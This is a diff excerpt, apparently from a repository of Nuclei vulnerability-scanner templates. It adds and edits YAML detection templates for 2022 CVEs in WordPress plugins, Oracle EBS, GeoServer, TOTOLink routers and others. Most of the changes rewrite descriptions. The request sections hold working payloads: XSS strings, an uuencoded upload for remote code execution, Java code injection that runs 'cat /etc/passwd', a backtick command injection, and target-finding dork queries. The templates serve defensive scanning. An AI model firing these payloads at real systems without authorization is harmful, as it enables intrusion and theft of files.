cve-id: CVE-2022-1168
cwe-id: CWE-79
metadata:
google-dork: inurl:"wp-content/plugins/wp-jobsearch"
verified: "true"
tags: wp-jobsearch",wpscan,cve,cve2022,wp-plugin,wp,wordpress,xss
requests:
- method: GET
path:
- '{{BaseURL}}/plugins/jobsearch/?search_title=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert%28domain%29%3E&ajax_filter=true&posted=all&sort-by=recent'
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<img src=x onerror=alert(domain)>"
- "wp-jobsearch"
condition: and
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 404

View File

@ -0,0 +1,42 @@
id: CVE-2022-1595
info:
name: WordPress HC Custom WP-Admin URL <=1.4 - Admin Login URL Disclosure
author: theamanrawat
severity: medium
description: |
WordPress HC Custom WP-Admin URL plugin through 1.4 leaks the secret login URL when sending a specially crafted request, thereby allowing an attacker to discover the administrative login URL.
reference:
- https://wpscan.com/vulnerability/0218c90c-8f79-4f37-9a6f-60cf2f47d47b
- https://wordpress.org/plugins/hc-custom-wp-admin-url/
- https://nvd.nist.gov/vuln/detail/CVE-2022-1595
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2022-1595
cwe-id: CWE-200
metadata:
verified: "true"
tags: unauth,wpscan,cve,cve2022,wordpress,wp-plugin,wp,hc-custom-wp-admin-url
requests:
- raw:
- |
HEAD /wp-login.php HTTP/1.1
Host: {{Hostname}}
Cookie: valid_login_slug=1
matchers-condition: and
matchers:
- type: regex
part: header
regex:
- "Location: ([a-zA-Z0-9_.\\/-]+)"
- "wordpress_"
condition: and
- type: status
status:
- 302
# Enhanced by md on 2023/01/06

View File

@ -1,16 +1,16 @@
id: CVE-2022-1883
info:
name: Terraboard < 2.2.0 - SQL Injection
name: Terraboard <2.2.0 - SQL Injection
author: edoardottt
severity: high
description: |
SQL Injection in GitHub repository camptocamp/terraboard prior to 2.2.0.
Terraboard prior to 2.2.0 contains a SQL injection vulnerability. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
reference:
- https://huntr.dev/bounties/a25d15bd-cd23-487e-85cd-587960f1b9e7/
- https://nvd.nist.gov/vuln/detail/CVE-2022-1883
- https://github.com/camptocamp/terraboard/commit/2a5dbaac015dc0714b41a59995e24f5767f89ddc
- https://huntr.dev/bounties/a25d15bd-cd23-487e-85cd-587960f1b9e7
- https://nvd.nist.gov/vuln/detail/CVE-2022-1883
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
@ -41,3 +41,5 @@ requests:
- type: status
status:
- 200
# Enhanced by md on 2022/12/09

View File

@ -1,11 +1,11 @@
id: CVE-2022-1916
info:
name: Active Products Tables for WooCommerce < 1.0.5 - Cross Site Scripting
name: WordPress Active Products Tables for WooCommerce <1.0.5 - Cross-Site Scripting
author: Akincibor
severity: medium
description: |
The plugin does not sanitise and escape a parameter before outputting it back in the response of an AJAX action (available to both unauthenticated and authenticated users), leading to a Reflected cross-Site Scripting.
WordPress Active Products Tables for WooCommerce plugin prior to 1.0.5 contains a cross-site scripting vulnerability.. The plugin does not sanitize and escape a parameter before outputting it back in the response of an AJAX action, An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
reference:
- https://wpscan.com/vulnerability/d16a0c3d-4318-4ecd-9e65-fc4165af8808
- https://nvd.nist.gov/vuln/detail/CVE-2022-1916
@ -44,3 +44,5 @@ requests:
- type: status
status:
- 200
# Enhanced by md on 2022/12/13

View File

@ -1,11 +1,11 @@
id: CVE-2022-1933
info:
name: CDI < 5.1.9 - Cross Site Scripting
name: WordPress CDI <5.1.9 - Cross Site Scripting
author: Akincibor
severity: medium
description: |
The plugin does not sanitise and escape a parameter before outputting it back in the response of an AJAX action (available to both unauthenticated and authenticated users), leading to a Reflected Cross-Site Scripting.
WordPress CDI plugin prior to 5.1.9 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape a parameter before outputting it back in the response of an AJAX action. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
reference:
- https://wpscan.com/vulnerability/6cedb27f-6140-4cba-836f-63de98e521bf
- https://wordpress.org/plugins/collect-and-deliver-interface-for-woocommerce/advanced/
@ -41,3 +41,5 @@ requests:
- type: status
status:
- 200
# Enhanced by md on 2022/12/13

View File

@ -0,0 +1,76 @@
id: CVE-2022-21587
info:
name: Oracle EBS Unauthenticated - Remote Code Execution
author: rootxharsh,iamnoooob
severity: critical
description: |
Vulnerability in the Oracle Web Applications Desktop Integrator product of Oracle E-Business Suite (component: Upload). Supported versions that are affected are 12.2.3-12.2.11. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Web Applications Desktop Integrator. Successful attacks of this vulnerability can result in takeover of Oracle Web Applications Desktop Integrator.
reference:
- https://blog.viettelcybersecurity.com/cve-2022-21587-oracle-e-business-suite-unauth-rce/
- https://www.oracle.com/security-alerts/cpuoct2022.html
- https://nvd.nist.gov/vuln/detail/CVE-2022-21587
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-21587
tags: cve,cve2022,rce,oast,intrusive,oracle,ebs,unauth
requests:
- raw:
- |
POST /OA_HTML/BneViewerXMLService?bne:uueupload=TRUE HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryZsMro0UsAQYLDZGv
------WebKitFormBoundaryZsMro0UsAQYLDZGv
Content-Disposition: form-data; name="bne:uueupload"
TRUE
------WebKitFormBoundaryZsMro0UsAQYLDZGv
Content-Disposition: form-data; name="uploadfilename";filename="testzuue.zip"
begin 664 test.zip
M4$L#!!0``````"]P-%;HR5LG>@```'H```!#````+BXO+BXO+BXO+BXO+BXO
M1DU77TAO;64O3W)A8VQE7T5"4RUA<'`Q+V-O;6UO;B]S8W)I<'1S+W1X:T9.
M1%=24BYP;'5S92!#1TD["G!R:6YT($-'23HZ:&5A9&5R*"`M='EP92`]/B`G
M=&5X="]P;&%I;B<@*3L*;7D@)&-M9"`](")E8VAO($YU8VQE:2U#5D4M,C`R
M,BTR,34X-R(["G!R:6YT('-Y<W1E;2@D8VUD*3L*97AI="`P.PH*4$L!`A0#
M%```````+W`T5NC)6R=Z````>@```$,``````````````+2!`````"XN+RXN
M+RXN+RXN+RXN+T9-5U](;VUE+T]R86-L95]%0E,M87!P,2]C;VUM;VXO<V-R
G:7!T<R]T>&M&3D174E(N<&Q02P4&``````$``0!Q````VP``````
`
end
------WebKitFormBoundaryZsMro0UsAQYLDZGv--
- |
GET /OA_CGI/FNDWRR.exe HTTP/1.1
Host: {{Hostname}}
- |
POST /OA_HTML/BneViewerXMLService?bne:uueupload=TRUE HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryZsMro0UsAQYLDZGv
------WebKitFormBoundaryZsMro0UsAQYLDZGv
Content-Disposition: form-data; name="bne:uueupload"
TRUE
------WebKitFormBoundaryZsMro0UsAQYLDZGv
Content-Disposition: form-data; name="uploadfilename";filename="testzuue.zip"
begin 664 test.zip
M4$L#!!0``````&UP-%:3!M<R`0````$```!#````+BXO+BXO+BXO+BXO+BXO
M1DU77TAO;64O3W)A8VQE7T5"4RUA<'`Q+V-O;6UO;B]S8W)I<'1S+W1X:T9.
M1%=24BYP;`I02P$"%`,4``````!M<#16DP;7,@$````!````0P``````````
M````M($`````+BXO+BXO+BXO+BXO+BXO1DU77TAO;64O3W)A8VQE7T5"4RUA
M<'`Q+V-O;6UO;B]S8W)I<'1S+W1X:T9.1%=24BYP;%!+!08``````0`!`'$`
(``!B````````
`
end
matchers:
- type: word
part: body_2
words:
- Nuclei-CVE-2022-21587

View File

@ -5,12 +5,12 @@ info:
author: EvergreenCartoons
severity: medium
description: |
A Cross-site Scripting (XSS) vulnerability in the J-Web component of Juniper Networks Junos OS allows an unauthenticated attacker to run malicious scripts reflected off of J-Web to the victim's browser in the context of their session within J-Web
Juniper Web Device Manager (J-Web) in Junos OS contains a cross-site scripting vulnerability. This can allow an unauthenticated attacker to run malicious scripts reflected off J-Web to the victim's browser in the context of their session within J-Web, which can allow the attacker to steal cookie-based authentication credentials and launch other attacks. This issue affects all versions prior to 19.1R3-S9; 19.2 versions prior to 19.2R3-S6; 19.3 versions prior to 19.3R3-S7; 19.4 versions prior to 19.4R2-S7, 19.4R3-S8; 20.1 versions prior to 20.1R3-S5; 20.2 versions prior to 20.2R3-S5; 20.3 versions prior to 20.3R3-S5; 20.4 versions prior to 20.4R3-S4; 21.1 versions prior to 21.1R3-S4; 21.2 versions prior to 21.2R3-S1; 21.3 versions prior to 21.3R3; 21.4 versions prior to 21.4R2; 22.1 versions prior to 22.1R2.
reference:
- https://octagon.net/blog/2022/10/28/juniper-sslvpn-junos-rce-and-multiple-vulnerabilities/
- https://nvd.nist.gov/vuln/detail/CVE-2022-22242
- https://supportportal.juniper.net/s/article/2022-10-Security-Bulletin-Junos-OS-Multiple-vulnerabilities-in-J-Web?language=en_US
- https://kb.juniper.net/JSA69899
- https://nvd.nist.gov/vuln/detail/CVE-2022-22242
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
@ -43,3 +43,5 @@ requests:
- type: status
status:
- 200
# Enhanced by md on 2022/12/13

View File

@ -0,0 +1,48 @@
id: CVE-2022-2314
info:
name: VR Calendar < 2.3.2 - Unauthenticated Arbitrary Function Call
author: theamanrawat
severity: critical
description: |
The VR Calendar WordPress plugin through 2.3.2 lets any user execute arbitrary PHP functions on the site.
reference:
- https://wpscan.com/vulnerability/b22fe77c-844e-4c24-8023-014441cc1e82
- https://wordpress.org/plugins/vr-calendar-sync/
- https://nvd.nist.gov/vuln/detail/CVE-2022-2314
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-2314
metadata:
verified: "true"
tags: rce,unauth,wpscan,cve,cve2022,wp,vr-calendar-sync,wordpress,wp-plugin
requests:
- raw:
- |
GET /wp-content/plugins/vr-calendar-sync/assets/js/public.js HTTP/1.1
Host: {{Hostname}}
- |
GET /wp-admin/admin-post.php?vrc_cmd=phpinfo HTTP/1.1
Host: {{Hostname}}
req-condition: true
matchers-condition: and
matchers:
- type: word
part: body_2
words:
- "phpinfo"
- "PHP Version"
condition: and
- type: word
part: body_1
words:
- "vrc-calendar"
- type: status
status:
- 200

View File

@ -1,20 +1,25 @@
id: CVE-2022-23854
info:
name: AVEVA InTouch Access Anywhere Secure Gateway - Path Traversal
name: AVEVA InTouch Access Anywhere Secure Gateway - Local File Inclusion
author: For3stCo1d
severity: high
description: |
AVEVA Group plc is a marine and plant engineering IT company headquartered in Cambridge, England. AVEVA software is used in many sectors, including on- and off-shore oil and gas processing, chemicals, pharmaceuticals, nuclear and conventional power generation, nuclear fuel reprocessing, recycling and shipbuilding (https://www.aveva.com).
AVEVA InTouch Access Anywhere Secure Gateway is vulnerable to local file inclusion.
reference:
- https://packetstormsecurity.com/files/cve/CVE-2022-23854
- https://www.aveva.com
- https://crisec.de/advisory-aveva-intouch-access-anywhere-secure-gateway-path-traversal
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23854
- https://www.cisa.gov/uscert/ics/advisories/icsa-22-342-02
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2022-23854
cwe-id: CWE-23
metadata:
verified: true
shodan-query: http.html:"InTouch Access Anywhere"
verified: "true"
tags: lfi,packetstorm,cve,cve2022,aveva,intouch
requests:
@ -38,3 +43,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2023/01/15

View File

@ -0,0 +1,73 @@
id: CVE-2022-24816
info:
name: Geoserver Server - Code Injection
author: mukundbhuva
severity: critical
description: |
Programs using jt-jiffle, and allowing Jiffle script to be provided via network request, are susceptible to a Remote Code Execution as the Jiffle script is compiled into Java code via Janino, and executed. In particular, this affects the downstream GeoServer project Version < 1.1.22.
reference:
- https://www.synacktiv.com/en/publications/exploiting-cve-2022-24816-a-code-injection-in-the-jt-jiffle-extension-of-geoserver.html
- https://nvd.nist.gov/vuln/detail/CVE-2022-24816
- https://github.com/geosolutions-it/jai-ext/security/advisories/GHSA-v92f-jx6p-73rx
- https://github.com/geosolutions-it/jai-ext/commit/cb1d6565d38954676b0a366da4f965fef38da1cb
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-24816
cwe-id: CWE-94
metadata:
fofa-query: app="GeoServer"
shodan-query: /geoserver/
verified: "true"
tags: cve,cve2022,geoserver,rce
requests:
- raw:
- |
POST /geoserver/wms HTTP/1.1
Host: {{Hostname}}
Content-Type: application/xml
<?xml version="1.0" encoding="UTF-8"?>
<wps:Execute version="1.0.0" service="WPS" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns="http://www.opengis.net/wps/1.0.0" xmlns:wfs="http://www.opengis.net/wfs" xmlns:wps="http://www.opengis.net/wps/1.0.0" xmlns:ows="http://www.opengis.net/ows/1.1" xmlns:gml="http://www.opengis.net/gml" xmlns:ogc="http://www.opengis.net/ogc" xmlns:wcs="http://www.opengis.net/wcs/1.1.1" xmlns:xlink="http://www.w3.org/1999/xlink" xsi:schemaLocation="http://www.opengis.net/wps/1.0.0 http://schemas.opengis.net/wps/1.0.0/wpsAll.xsd">
<ows:Identifier>ras:Jiffle</ows:Identifier>
<wps:DataInputs>
<wps:Input>
<ows:Identifier>coverage</ows:Identifier>
<wps:Data>
<wps:ComplexData mimeType="application/arcgrid"><![CDATA[ncols 720 nrows 360 xllcorner -180 yllcorner -90 cellsize 0.5 NODATA_value -9999 316]]></wps:ComplexData>
</wps:Data>
</wps:Input>
<wps:Input>
<ows:Identifier>script</ows:Identifier>
<wps:Data>
<wps:LiteralData>dest = y() - (500); // */ public class Double { public static double NaN = 0; static { try { java.io.BufferedReader reader = new java.io.BufferedReader(new java.io.InputStreamReader(java.lang.Runtime.getRuntime().exec("cat /etc/passwd").getInputStream())); String line = null; String allLines = " - "; while ((line = reader.readLine()) != null) { allLines += line; } throw new RuntimeException(allLines);} catch (java.io.IOException e) {} }} /**</wps:LiteralData>
</wps:Data>
</wps:Input>
<wps:Input>
<ows:Identifier>outputType</ows:Identifier>
<wps:Data>
<wps:LiteralData>DOUBLE</wps:LiteralData>
</wps:Data>
</wps:Input>
</wps:DataInputs>
<wps:ResponseForm>
<wps:RawDataOutput mimeType="image/tiff">
<ows:Identifier>result</ows:Identifier>
</wps:RawDataOutput>
</wps:ResponseForm>
</wps:Execute>
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
- "ExceptionInInitializerError"
condition: and
- type: status
status:
- 200

View File

@ -0,0 +1,50 @@
id: CVE-2022-25082
info:
name: TOTOLink - Unauthenticated Command Injection
author: gy741
severity: critical
description: |
TOTOLink A950RG V5.9c.4050_B20190424 and V4.1.2cu.5204_B20210112 were discovered to contain a command injection vulnerability in the Main function. This vulnerability allows attackers to execute arbitrary commands via the QUERY_STRING parameter.
reference:
- https://nvd.nist.gov/vuln/detail/cve-2022-25082
- https://github.com/EPhaha/IOT_vuln/blob/main/TOTOLink/A950RG/README.md
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-25082
cwe-id: CWE-77
tags: totolink,cve,cve2022,router,unauth,rce,iot
variables:
cmd: "`ls>../{{randstr}}`"
requests:
- raw:
- |
GET /cgi-bin/downloadFlile.cgi?payload={{cmd}} HTTP/1.1
Host: {{Hostname}}
- |
GET /{{randstr}} HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body_2
words:
- ".sh"
- ".cgi"
condition: and
- type: word
part: header_2
words:
- 'application/octet-stream'
- type: status
status:
- 200
# Enhanced by mp on 2022/11/05

View File

@ -1,16 +1,16 @@
id: CVE-2022-26138
info:
name: Questions For Confluence - Hardcoded Credentials
name: Atlassian Questions For Confluence - Hardcoded Credentials
author: HTTPVoid
severity: critical
description: |
A remote, unauthenticated attacker with knowledge of the hardcoded password could exploit this to log into Confluence and access all content accessible to users in the confluence-users group.
Atlassian Questions For Confluence contains a hardcoded credentials vulnerability. When installing versions 2.7.34, 2.7.35, and 3.0.2, a Confluence user account is created in the confluence-users group with the username disabledsystemuser and a hardcoded password. A remote, unauthenticated attacker with knowledge of the hardcoded password can exploit this vulnerability to log into Confluence and access all content accessible to users in the confluence-users group.
reference:
- https://twitter.com/fluepke/status/1549892089181257729
- https://confluence.atlassian.com/doc/questions-for-confluence-security-advisory-2022-07-20-1142446709.html
- https://nvd.nist.gov/vuln/detail/CVE-2022-26138
- https://confluence.atlassian.com/doc/confluence-security-advisory-2022-07-20-1142446709.html
- https://nvd.nist.gov/vuln/detail/CVE-2022-26138
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
@ -40,3 +40,5 @@ requests:
- type: dsl
dsl:
- 'location == "/httpvoid.action"'
# Enhanced by md on 2023/01/06

View File

@ -1,16 +1,19 @@
id: CVE-2022-26263
info:
name: Yonyou u8 v13.0 - Cross Site Scripting
name: Yonyou U8 13.0 - Cross-Site Scripting
author: edoardottt,theamanrawat
severity: medium
description: |
Yonyou u8 v13.0 was discovered to contain a DOM-based cross-site scripting (XSS) vulnerability via the component /u8sl/WebHelp.
Yonyou U8 13.0 contains a DOM-based cross-site scripting vulnerability via the component /u8sl/WebHelp. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
reference:
- https://github.com/s7safe/CVE/blob/main/CVE-2022-26263.md
- https://nvd.nist.gov/vuln/detail/CVE-2022-26263
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.4
cve-id: CVE-2022-26263
cwe-id: CWE-80
metadata:
verified: true
google-dork: inurl:/u8sl/WebHelp
@ -29,3 +32,5 @@ headless:
- '<frame src="javascript:console.log(document.domain)"'
- 'webhelp4.js'
condition: and
# Enhanced by md on 2022/12/13

View File

@ -1,16 +1,15 @@
id: CVE-2022-27593
info:
name: QNAP QTS Photo Station External Reference
name: QNAP QTS Photo Station External Reference - Local File Inclusion
author: allenwest24
severity: critical
description: |
An externally controlled reference to a resource vulnerability has been reported to affect QNAP NAS running Photo Station. If exploited, This could allow an attacker to modify system files. We have already fixed the vulnerability in the following versions: QTS 5.0.1: Photo Station 6.1.2 and later QTS 5.0.0/4.5.x: Photo Station 6.0.22 and later QTS 4.3.6: Photo Station 5.7.18 and later QTS 4.3.3: Photo Station 5.4.15 and later QTS 4.2.6: Photo Station 5.2.14 and later
QNAP QTS Photo Station External Reference is vulnerable to local file inclusion via an externally controlled reference to a resource vulnerability. If exploited, this could allow an attacker to modify system files. The vulnerability is fixed in the following versions: QTS 5.0.1: Photo Station 6.1.2 and later QTS 5.0.0/4.5.x: Photo Station 6.0.22 and later QTS 4.3.6: Photo Station 5.7.18 and later QTS 4.3.3: Photo Station 5.4.15 and later QTS 4.2.6: Photo Station 5.2.14 and later.
reference:
- https://attackerkb.com/topics/7We3SjEYVo/cve-2022-27593
- https://www.qnap.com/en/security-advisory/qsa-22-24
- https://nvd.nist.gov/vuln/detail/CVE-2022-27593
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27593
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H
cvss-score: 9.1
@ -39,3 +38,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2023/01/15

Some files were not shown because too many files have changed in this diff Show More